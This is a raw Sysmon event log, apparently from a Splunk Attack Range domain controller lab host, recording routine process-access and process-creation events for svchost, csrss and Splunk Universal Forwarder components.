13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8FDD-6005-0201-00000000A301}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FDD-6005-0201-00000000A301}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.365{59A5CD1D-8FDD-6005-0201-00000000A301}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FDE-6005-0301-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FDE-6005-0301-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FDE-6005-0301-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.037{59A5CD1D-8FDE-6005-0301-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.333{59A5CD1D-8FDF-6005-0401-00000000A301}18085008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FDF-6005-0401-00000000A301}1808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 